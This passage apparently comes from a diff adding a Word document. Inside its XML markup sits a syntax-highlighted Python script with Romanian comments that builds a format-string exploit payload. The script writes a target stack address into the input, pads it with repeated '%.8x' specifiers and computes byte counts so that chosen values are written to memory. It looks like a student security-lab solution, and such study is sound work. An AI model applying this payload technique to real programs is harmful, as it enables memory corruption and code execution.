+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>dummy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>address2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ffffd056</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#a doua adresa a valorii</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(address2)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>to_bytes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>byteorder</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'little'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se pune adresa in stringul de input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#pana aici vor fi 4 + 4 + 4 = 12 caractere afisate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>%.8x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>_"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>62</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se acceseaza cei 62 de octeti, urmand ca la al 63-lea sa i se adauge padding pana cand</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(s)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'latin-1'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se ajunge la un numar de 0xAABB octeti afisati (43707)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># vor fi 62 * 9 = 558 de caractere afiate =&gt; PANA ACUM SUNT 570 de caractere</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#mai trebuie 0xd2a0 = 53920=&gt; 53920 - 570 = 53350</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>%.53350x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
